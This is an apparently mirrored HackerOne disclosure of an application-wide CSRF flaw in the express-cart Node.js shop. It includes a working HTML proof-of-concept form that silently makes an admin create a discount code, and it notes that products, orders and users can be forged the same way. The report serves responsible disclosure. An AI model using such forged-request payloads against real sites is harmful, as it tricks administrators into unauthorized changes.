[express-cart] Wide CSRF in application

Disclosed: 2020-07-21 07:58:43 By tuo4n8 To nodejs-ecosystem
Medium
Vulnerability Details
> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! I would like to report CSRF in ``express-cart` It allows attacker cheat admin to do bad behaviors . Main reason is csrf token isn't used , vulnerability is application wide . # Module **module name:** `express-cart` **version:** `1.1.16` **npm page:** `https://www.npmjs.com/package/express-cart` ## Module Description > expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments. ## Module Stats [1] weekly downloads : 21 # Vulnerability ## Vulnerability Description > Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other. - Through csrf attacker can do : create product , order , user , create discount codes ,.... (required admin action) ## Steps To Reproduce: > Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put. - Demo create discount codes : (View detail on clip ) 1. Create PoC with HTML (generated by burpsuite) 2. Admin click 3. `discount code` is created - PoC : ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:1111/admin/settings/discount/create" method="POST"> <input type="hidden" name="code" value="CSRF&#45;CODE&#45;DEMO" /> <input type="hidden" name="type" value="percent" /> <input type="hidden" name="value" value="30" /> <input type="hidden" name="start" value="21&#47;02&#47;2020&#32;14&#58;32" /> <input type="hidden" name="end" value="22&#47;02&#47;2020&#32;14&#58;32" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` # Wrap up > Select Y or N for the following statements: - I contacted the maintainer to let them know: [Y/N] N - I opened an issue in the related repository: [Y/N] N > Hunter's comments and funny memes goes here ## Impact attacker can do admin privileges
Actions
View on HackerOne
Report Stats
  • Report ID: 800356
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report